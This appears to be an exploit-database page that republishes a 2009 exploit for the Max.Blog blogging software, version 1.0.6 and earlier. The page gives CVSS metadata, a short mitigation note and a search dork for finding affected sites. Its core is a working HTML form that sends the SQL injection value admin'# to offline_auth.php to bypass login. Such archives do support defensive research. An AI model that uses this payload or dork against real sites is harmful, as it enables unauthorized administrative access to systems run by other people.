header-logo
Suggest Exploit
vendor:
Max.Blog
by:
Salvatore "drosophila" Fresta
7.5
CVSS
HIGH
Offline Authentication Bypass
89
CWE
Product Name: Max.Blog
Affected Version From: Max.Blog <= 1.0.6
Affected Version To: Max.Blog <= 1.0.6
Patch Exists: YES
Related CWE: N/A
CPE: a:mzbservices:max.blog
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Max.Blog <= 1.0.6 Offline Authentication Bypass Exploit

This bug allows a guest to bypass an offline authentication service using SQL Injection vulnerability.

Mitigation:

Ensure that magic quotes are enabled.
Source

Exploit-DB raw data:

###################             Salvatore "drosophila" Fresta
###################


Application:    Max.Blog
                               http://www.mzbservices.com
Version:                Max.Blog <= 1.0.6
Bug:            * Offline Authentication Bypass
Exploitation:   Remote
Dork:                   intext:"Powered by Max.Blog"
Date:           27 Jan 2009
Discovered by:  Salvatore "drosophila" Fresta
Author:         Salvatore "drosophila" Fresta
                       e-mail: drosophilaxxx@gmail.com


############################################################################

- BUGS

Offline Authentication Bypass Exploit:

       Requisites: magic quotes = off

       File affected: offline_auth.php

       This bug allows a guest to bypass an offline authentication service
       using SQL Injection vulnerability.

############################################################################

- CODE

<html>
       <head>
               <title>
                       Salvatore "drosophila" Fresta - Max.Blog <= 1.0.6 Offline
Authentication Bypass Exploit
               </title>
       </head>
       <body>
               <form
action="http://www.site.com/path/offline_auth.php" method="POST">
                       <input type="text" name="username"
value="admin'#" size="15">
                       <input type="hidden" name="password">
                       <input type="submit" value="Go!">
               </form>
       </body>
</html>

############################################################################

# milw0rm.com [2009-01-28]

Navigation

Suggest Exploit

Services By CQR